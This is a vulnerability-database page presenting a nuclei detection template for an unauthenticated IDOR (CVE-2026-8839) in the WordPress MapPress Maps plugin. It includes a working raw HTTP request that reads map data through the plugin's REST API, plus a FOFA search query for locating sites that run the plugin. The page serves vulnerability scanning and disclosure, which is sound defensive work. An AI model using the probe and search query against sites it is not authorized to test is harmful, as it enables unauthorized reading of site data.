Lucene search
K

WordPress MapPress Maps <= 2.96.6 - Unauthenticated IDOR

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 10 Views

WordPress MapPress Maps up to 2.96.6 has unauthenticated IDOR allowing map data read and edits.

Related
Refs
Code
id: CVE-2026-8839

info:
  name: WordPress MapPress Maps <= 2.96.6 - Unauthenticated IDOR
  author: 0x_Akoko
  severity: medium
  description: |
    MapPress Maps for WordPress <= 2.96.6 contains an authorization bypass caused by missing ownership verification in REST API routes, letting unauthenticated attackers read any map data and authenticated contributors modify any map, exploit requires crafted API requests
  impact: |
    Unauthenticated attackers can read sensitive map data; authenticated contributors can modify or delete any map, risking data exposure and unauthorized modifications.
  remediation: |
    Update to the latest version beyond 2.96.6.
  reference:
    - https://plugins.trac.wordpress.org/browser/mappress-google-maps-for-wordpress/trunk/mappress_api.php
    - https://nvd.nist.gov/vuln/detail/CVE-2026-8839
    - https://wordpress.org/plugins/mappress-google-maps-for-wordpress/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-8839
    epss-score: 0.00813
    epss-percentile: 0.52551
    cwe-id: CWE-639
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="wp-content/plugins/mappress-google-maps-for-wordpress"
  tags: cve,cve2026,wordpress,wp-plugin,mappress,idor,exposure,wp

http:
  - raw:
      - |
        GET /wp-json/mapp/v1/maps/1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "\"mapid\"", "\"pois\"", "\"center\"")'
        condition: and
# digest: 490a00463044022000dd54a4db41aee623625556446f6ced634a41340ee4d7b45f01cc82a08466ad02204c0abda3e61a4646f154291908a39bbf44794121422e9c35c1bd7f56fa1e25fb:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Jun 2026 03:09Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.15.3
EPSS0.00813
SSVC
10